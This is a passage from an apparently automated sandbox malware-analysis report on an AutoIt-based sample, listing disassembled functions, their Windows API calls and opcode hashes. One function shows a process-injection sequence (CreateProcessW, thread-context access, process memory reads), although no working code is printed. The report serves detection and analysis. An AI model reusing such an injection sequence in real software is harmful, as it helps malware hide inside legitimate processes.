                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: Exception@8Throw$ExceptionRaise
                                                                      • String ID: Unknown exception
                                                                      • API String ID: 3476068407-410509341
                                                                      • Opcode ID: 39e8fbc6c7b0b0e82ec29ba59dc7864deefbb49a56a23c057a86be3386080285
                                                                      • Instruction ID: 137093a958c5f914c5338f368356304a1a709730c713746eb289a178aeaa35e2
                                                                      • Opcode Fuzzy Hash: 39e8fbc6c7b0b0e82ec29ba59dc7864deefbb49a56a23c057a86be3386080285
                                                                      • Instruction Fuzzy Hash: 83F04C3080028C77CB01B666D84AE5E777D6EC0300BA08531B924D66D1EFB0DE55C6C0
                                                                      Function 00A33017 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 18COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetTempPathW.KERNEL32(00000104,?,00000001), ref: 00A3302F
                                                                      • GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 00A33044
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: Temp$FileNamePath
                                                                      • String ID: aut
                                                                      • API String ID: 3285503233-3010740371
                                                                      • Opcode ID: b10c57a4abadc6547898064ea9ed7dc6b6ee8a0a1f671dc8489c3917b8e764e7
                                                                      • Instruction ID: 08a610a79147774b4aa50418f13c790ba52eb6e060caf3cf16cba49aa534020c
                                                                      • Opcode Fuzzy Hash: b10c57a4abadc6547898064ea9ed7dc6b6ee8a0a1f671dc8489c3917b8e764e7
                                                                      • Instruction Fuzzy Hash: E3D05E725003287BDA20F7E4AC4EFCB7A6CEB04761F0006A1B655E2095EAB09985CBD0
                                                                      Function 00A47F59 Relevance: 4.9, APIs: 3, Instructions: 430COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetCurrentProcess.KERNEL32(00000000,00000067,000000FF,?,?,?), ref: 00A482F5
                                                                      • TerminateProcess.KERNEL32(00000000), ref: 00A482FC
                                                                      • FreeLibrary.KERNEL32(?,?,?,?), ref: 00A484DD
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: Process$CurrentFreeLibraryTerminate
                                                                      • String ID:
                                                                      • API String ID: 146820519-0
                                                                      • Opcode ID: 017a79964f8d1875a8a364d822addb1ec417699edcdacbf0b8b3457f51083e9a
                                                                      • Instruction ID: 5295acbcd2fed9f6315992aaf634c27abb7251caa08257dd952d55a596b21893
                                                                      • Opcode Fuzzy Hash: 017a79964f8d1875a8a364d822addb1ec417699edcdacbf0b8b3457f51083e9a
                                                                      • Instruction Fuzzy Hash: 0A127A75A083019FC724DF28D484B2EBBE1BFC9314F14895DE8998B252DB35ED45CB92
                                                                      Function 009F5AA9 Relevance: 4.7, APIs: 3, Instructions: 186COMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: f182c13423ff32b7868832d9272b967f4e1728f6f565c79f06d3d7f355348acd
                                                                      • Instruction ID: 1a898539722b763fb5495011c6ccb8f5e324e5218efc5a9f1e411bbe2591edbd
                                                                      • Opcode Fuzzy Hash: f182c13423ff32b7868832d9272b967f4e1728f6f565c79f06d3d7f355348acd
                                                                      • Instruction Fuzzy Hash: 5E51A071E00A0D9FCB11AFA9C845FBEBBB8AF45321F16045AF705A7291D7359A01CB61
                                                                      Function 009C10F3 Relevance: 4.7, APIs: 3, Instructions: 153comCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 009C1BC3: MapVirtualKeyW.USER32(0000005B,00000000), ref: 009C1BF4
                                                                        • Part of subcall function 009C1BC3: MapVirtualKeyW.USER32(00000010,00000000), ref: 009C1BFC
                                                                        • Part of subcall function 009C1BC3: MapVirtualKeyW.USER32(000000A0,00000000), ref: 009C1C07
                                                                        • Part of subcall function 009C1BC3: MapVirtualKeyW.USER32(000000A1,00000000), ref: 009C1C12
                                                                        • Part of subcall function 009C1BC3: MapVirtualKeyW.USER32(00000011,00000000), ref: 009C1C1A
                                                                        • Part of subcall function 009C1BC3: MapVirtualKeyW.USER32(00000012,00000000), ref: 009C1C22
                                                                        • Part of subcall function 009C1B4A: RegisterWindowMessageW.USER32(00000004,?,009C12C4), ref: 009C1BA2
                                                                      • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 009C136A
                                                                      • OleInitialize.OLE32 ref: 009C1388
                                                                      • CloseHandle.KERNEL32(00000000,00000000), ref: 00A024AB
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                                                                      • String ID:
                                                                      • API String ID: 1986988660-0
                                                                      • Opcode ID: 0907afe031a795595bdcfd6ff1d15881caff0c157e4a499ed9095014e16e8ab7
                                                                      • Instruction ID: 19d93293cb378d88740374891ddc31cba75a4104c8ea034c7c1ed5fe33a96816
                                                                      • Opcode Fuzzy Hash: 0907afe031a795595bdcfd6ff1d15881caff0c157e4a499ed9095014e16e8ab7
                                                                      • Instruction Fuzzy Hash: 097189B8F113028FCB85DFB9A985A593AE0BB89394756862FD41AC7362EF304447CF45
                                                                      Function 00A2C161 Relevance: 4.6, APIs: 3, Instructions: 74timewindowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 009C3923: Shell_NotifyIconW.SHELL32(00000001,?), ref: 009C3A04
                                                                      • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00A2C259
                                                                      • KillTimer.USER32(?,00000001,?,?), ref: 00A2C261
                                                                      • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00A2C270
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: IconNotifyShell_Timer$Kill
                                                                      • String ID:
                                                                      • API String ID: 3500052701-0
                                                                      • Opcode ID: 6112d1d990dd097c51598e95e4e363a38d855cb4028cabb5f837a010893dbcb3
                                                                      • Instruction ID: 0a9ea362b9d27e57b9a7b5b4b7a942af0b49a4864b2e6db1717acede21b163fe
                                                                      • Opcode Fuzzy Hash: 6112d1d990dd097c51598e95e4e363a38d855cb4028cabb5f837a010893dbcb3
                                                                      • Instruction Fuzzy Hash: 5131D570904364AFEB32DF689855BEBBBFCAF06318F0004AED1DA97241CB745A85CB51
                                                                      Function 009F86AE Relevance: 4.6, APIs: 3, Instructions: 61COMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • CloseHandle.KERNELBASE(00000000,00000000,?,?,009F85CC,?,00A88CC8,0000000C), ref: 009F8704
                                                                      • GetLastError.KERNEL32(?,009F85CC,?,00A88CC8,0000000C), ref: 009F870E
                                                                      • __dosmaperr.LIBCMT ref: 009F8739
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: CloseErrorHandleLast__dosmaperr
                                                                      • String ID:
                                                                      • API String ID: 2583163307-0
                                                                      • Opcode ID: ba5afb7bdac6359c3b09d6ba4d76e312840b291c57dc1b30742355806877df7b
                                                                      • Instruction ID: 13335ff76112f6b14670ae1cb9be19b3c59bdfcc823687c8a235a5fae3f84ce5
                                                                      • Opcode Fuzzy Hash: ba5afb7bdac6359c3b09d6ba4d76e312840b291c57dc1b30742355806877df7b
                                                                      • Instruction Fuzzy Hash: 8E012B33605A685AD6A4A2786849B7F678D8BC2779F3A0119FB14CB1D2DEA18C818350
                                                                      Function 009CDB38 Relevance: 4.5, APIs: 3, Instructions: 29windowsleepCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • TranslateMessage.USER32(?), ref: 009CDB7B
                                                                      • DispatchMessageW.USER32(?), ref: 009CDB89
                                                                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 009CDB9F
                                                                      • Sleep.KERNEL32(0000000A), ref: 009CDBB1
                                                                      • TranslateAcceleratorW.USER32(?,?,?), ref: 00A11CC9
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: Message$Translate$AcceleratorDispatchPeekSleep
                                                                      • String ID:
                                                                      • API String ID: 3288985973-0
                                                                      • Opcode ID: 3df22c0ecb970f7a3f05dc52401d7abdac4eef02bb4d3fc85a7b4dd86dbe206f
                                                                      • Instruction ID: 4b3671e511ba00a70c0c34fff66ab3d3b0c5cfc94404a4c6076d155ed81c37c1
                                                                      • Opcode Fuzzy Hash: 3df22c0ecb970f7a3f05dc52401d7abdac4eef02bb4d3fc85a7b4dd86dbe206f
                                                                      • Instruction Fuzzy Hash: BFF082306453419BEB30CBA0CC89FEA73ECFB88311F104929E60AC30C0EB309489DB26
                                                                      Function 00A32FD8 Relevance: 4.5, APIs: 3, Instructions: 27filetimeCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,00000000,?,?,00A32CD4,?,?,?,00000004,00000001), ref: 00A32FF2
                                                                      • SetFileTime.KERNELBASE(00000000,?,00000000,?,?,00A32CD4,?,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00A33006
                                                                      • CloseHandle.KERNEL32(00000000,?,00A32CD4,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00A3300D
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: File$CloseCreateHandleTime
                                                                      • String ID:
                                                                      • API String ID: 3397143404-0
                                                                      • Opcode ID: fc47b2472cfa35f55a59f135445d8f8c891a06cd9190215f437f8df2f8897e1b
                                                                      • Instruction ID: 5e0a17a9decb6739e4c0dc766bce1288d1a17f90d45cbeb4fe2e549ba7188c80
                                                                      • Opcode Fuzzy Hash: fc47b2472cfa35f55a59f135445d8f8c891a06cd9190215f437f8df2f8897e1b
                                                                      • Instruction Fuzzy Hash: 26E086366807147BD63017A5BC0DF8B3A1CF786B72F104210F719790D046A0150282A8
                                                                      Function 009D1310 Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 531COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • __Init_thread_footer.LIBCMT ref: 009D17F6
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: Init_thread_footer
                                                                      • String ID: CALL
                                                                      • API String ID: 1385522511-4196123274
                                                                      • Opcode ID: 4ae49e01524c8b6d81bc297c0ec958e04e63fee14ab027ec0ec93b5a7dbce7db
                                                                      • Instruction ID: c1564ff5f33f168bca3b73131b74399b2e26cf0f78ec93fe25311ccf483399da
                                                                      • Opcode Fuzzy Hash: 4ae49e01524c8b6d81bc297c0ec958e04e63fee14ab027ec0ec93b5a7dbce7db
                                                                      • Instruction Fuzzy Hash: 5D229B71648301AFC714CF14C490B6ABBF6BF89314F14895EF4968B3A2D735E985CB92
                                                                      Function 00A36EF1 Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 297COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • _wcslen.LIBCMT ref: 00A36F6B
                                                                        • Part of subcall function 009C4ECB: LoadLibraryExW.KERNEL32(?,00000000,00000002,?,00A91418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 009C4EFD
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: LibraryLoad_wcslen
                                                                      • String ID: >>>AUTOIT SCRIPT<<<
                                                                      • API String ID: 3312870042-2806939583
                                                                      • Opcode ID: 5d8d54725612f4e418d47370003a78ed082e48037ae19d599a49258aaf69ff18
                                                                      • Instruction ID: 46cc0b9b8d43b59aae6d6499658362d68ca965281c8a844682f566fbbe4ee943
                                                                      • Opcode Fuzzy Hash: 5d8d54725612f4e418d47370003a78ed082e48037ae19d599a49258aaf69ff18
                                                                      • Instruction Fuzzy Hash: 62B170716082019FCB14EF64C491FAEB7E5AFD4314F04896DF496972A2EB30ED49CB92
                                                                      Function 009C2DE3 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 64COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetOpenFileNameW.COMDLG32(?), ref: 00A02C8C
                                                                        • Part of subcall function 009C3AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,009C3A97,?,?,009C2E7F,?,?,?,00000000), ref: 009C3AC2
                                                                        • Part of subcall function 009C2DA5: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 009C2DC4
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: Name$Path$FileFullLongOpen
                                                                      • String ID: X
                                                                      • API String ID: 779396738-3081909835
                                                                      • Opcode ID: b5e32256e58901fbbfca2730ab8a60b8803fd73b625c3cdda3e0ddd7c039e5ec
                                                                      • Instruction ID: 5cf84e9fec912dccb0c2e769cf5d1a96a75b27dd680d000daca89c2ec6c5b0bf
                                                                      • Opcode Fuzzy Hash: b5e32256e58901fbbfca2730ab8a60b8803fd73b625c3cdda3e0ddd7c039e5ec
                                                                      • Instruction Fuzzy Hash: A5219671E102589FDB01EF94D845BDE7BFCAF88314F008059E405BB281DBB45A498F61
                                                                      Function 009C3837 Relevance: 3.1, APIs: 2, Instructions: 77windowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • Shell_NotifyIconW.SHELL32(00000000,?), ref: 009C3908
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: IconNotifyShell_
                                                                      • String ID:
                                                                      • API String ID: 1144537725-0
                                                                      • Opcode ID: eff77fbd59e18a862af87746cafd0db0f3d2ff0cfbd3932d521ea456bfd8a445
                                                                      • Instruction ID: 775183347b8a54b40707d88113cf1a84e95a447bd016aab4c72917cf44e92bfe
                                                                      • Opcode Fuzzy Hash: eff77fbd59e18a862af87746cafd0db0f3d2ff0cfbd3932d521ea456bfd8a445
                                                                      • Instruction Fuzzy Hash: CC31A270A04301DFD761DF64D885B97BBF8FB49758F00492EF59987240E7B1AA44CB52
                                                                      Function 009CB710 Relevance: 2.1, APIs: 1, Instructions: 587COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • __Init_thread_footer.LIBCMT ref: 009CBB4E
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: Init_thread_footer
                                                                      • String ID:
                                                                      • API String ID: 1385522511-0
                                                                      • Opcode ID: 65d9d11bd69c2c2ae4f27ccbb21c44ebad3fc2717612146412e7b0307d6f284a
                                                                      • Instruction ID: b635df9d833d12f77c00529528e7192ab7ec2c4e0f2bf7c288e20a1567fd8566
                                                                      • Opcode Fuzzy Hash: 65d9d11bd69c2c2ae4f27ccbb21c44ebad3fc2717612146412e7b0307d6f284a
                                                                      • Instruction Fuzzy Hash: C0329B35E00209EFDB24CF54C896FBEB7B9EF44354F14805AE915AB251C7B8AD81CB92
                                                                      Function 016E0E25 Relevance: 1.9, APIs: 1, Instructions: 400processthreadCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • CreateProcessW.KERNELBASE(?,00000000), ref: 016E15E3
                                                                      • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 016E1679
                                                                      • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 016E169B
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1467271665.00000000016DF000.00000040.00000020.00020000.00000000.sdmp, Offset: 016DF000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_16df000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                                      • String ID:
                                                                      • API String ID: 2438371351-0
                                                                      • Opcode ID: df6a772f5278f9eae63f3a29a40672dfa4321236305f3f5d8c91d224ff423281
                                                                      • Instruction ID: d62c54ef2d04186b07e8ba6175db9f09f0714475df0ecb5ed4e198f3e3b9b918
                                                                      • Opcode Fuzzy Hash: df6a772f5278f9eae63f3a29a40672dfa4321236305f3f5d8c91d224ff423281
                                                                      • Instruction Fuzzy Hash: DD12DE20A18658C6EB24DF64D8547DEB272FF68300F1091E9910DEB7A4E77A4F81CF5A
                                                                      Function 009DFC70 Relevance: 1.6, APIs: 1, Instructions: 94memoryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: ProtectVirtual
                                                                      • String ID:
                                                                      • API String ID: 544645111-0
                                                                      • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                      • Instruction ID: 1856b2dcdb411be23b18188dab72f43381f7d78edbd8f8eea3e8ad1a42f6e07f
                                                                      • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                      • Instruction Fuzzy Hash: 21311574A40109DBC718CF69D4A2969F7A6FF49304B24C6A6E84ACB751D731EDD1CBC0
                                                                      Function 009C4ECB Relevance: 1.6, APIs: 1, Instructions: 65libraryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 009C4E90: LoadLibraryA.KERNEL32(kernel32.dll,?,?,009C4EDD,?,00A91418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 009C4E9C
                                                                        • Part of subcall function 009C4E90: GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 009C4EAE
                                                                        • Part of subcall function 009C4E90: FreeLibrary.KERNEL32(00000000,?,?,009C4EDD,?,00A91418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 009C4EC0
                                                                      • LoadLibraryExW.KERNEL32(?,00000000,00000002,?,00A91418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 009C4EFD
